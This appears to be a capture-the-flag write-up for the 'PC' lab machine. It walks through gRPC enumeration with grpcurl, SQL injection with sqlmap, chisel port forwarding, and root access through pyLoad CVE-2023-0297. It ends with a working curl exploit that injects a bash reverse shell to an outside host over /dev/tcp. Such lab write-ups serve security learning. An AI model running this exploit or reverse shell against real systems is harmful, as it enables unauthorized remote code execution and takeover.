PC, an easy machine involved enumerating gRPC services, where a method vulnerable to SQLi, giving us the credentials for sau user, escalating privileges by port forwarding a login page on port 8000 which had pyLoad running vulnerable to CVE-2023–0297 which is a pre-authentication code execution, giving us the root shell.
NMAP
Nmap scan report for 10.129.19.240
Host is up (0.21s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91bf44edea1e3224301f532cea71e5ef (RSA)
| 256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_ 256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open unknownPORT 50051
Connecting to this port through telnet or netcat, doesn't yield anything but ???
Researching what runs on port 50051 shows that, gRPC uses this port which is an open source remote procedure call framework by google
We can analyze the traffic through wireshark by sniffing packets on our interface (tun0) and changing protocol to HTTP/2
gRPC can be enumerated through grpcurl
grpcurl -plaintext 10.129.19.240:50051 listThis listed two services, let’s try listing the methods in SimpleApp
SimpleApp service has three methods which can be checked with describe argument
We can register and login with an account which in return provides an id
grpcurl -plaintext -d '{"username":"arz101" , "password":"12345"}' 10.129.19.240:50051 SimpleApp/RegisterUser grpcurl -plaintext -d '{"username":"arz101" , "password":"12345"}' 10.129.19.240:50051 SimpleApp/LoginUserNow using getInfo will ask for a token
Foothold
If we go back to login method, we do use a token if we enable verbosity with -vv
grpcurl -vv -plaintext -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYXJ6MTAxIiwiZXhwIjoxNjg0NjkzODY1fQ.CMWWeEN92nUfwMh8_AUGBPjHsIC7oIRTVDBZEy2qDS8" 10.129.19.240:50051 SimpleApp/getInfoThis gives us an error Unexpected : bad argument type for built-in operation due to we haven’t specified the data, if we use describe to see what parameters the method accepts
It needs the ID which we get after logging in
grpcurl -vv -plaintext -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYXJ6MTAxIiwiZXhwIjoxNjg0NjkzODY1fQ.CMWWeEN92nUfwMh8_AUGBPjHsIC7oIRTVDBZEy2qDS8" -d '{"id": "842"}' 10.129.19.240:50051 SimpleApp/getInfoBut tampering/playing around with this was a little difficult, so I tried postman and grpcui which gives you GUI with which you can work with gRPC service and also intercept the requests easily
After identifying that it was using some filters for sqli, we can try running sqlmap which found injection on id parameter
With these credentials, we can login as sau user
Privilege Escalation
Having enumerated the SUIDs, the files which are owned sau none of them showed any path to escalation, checking the local ports, there was port 8000 open which redirects to a login page
Port forwarding with chisel
chisel server -p 3333 --reverse
chisel client 10.10.16.19:3333 R:localhost:8000Now accessing the port on our browser we'll get a login page for pyLoad which is a download manager for python
Trying the default credentials like admin:admin and pyload:pyload didn't work, so searching for CVEs there was a pre-auth rce vulnerability (CVE-2023-0297)
Using the poc we'll get a shell as the root user
curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"%2Fbin%2Fbash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F10%2E10%2E16%2E19%2F2222%200%3E%261%27\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://localhost:8000/flash/addcrypted2'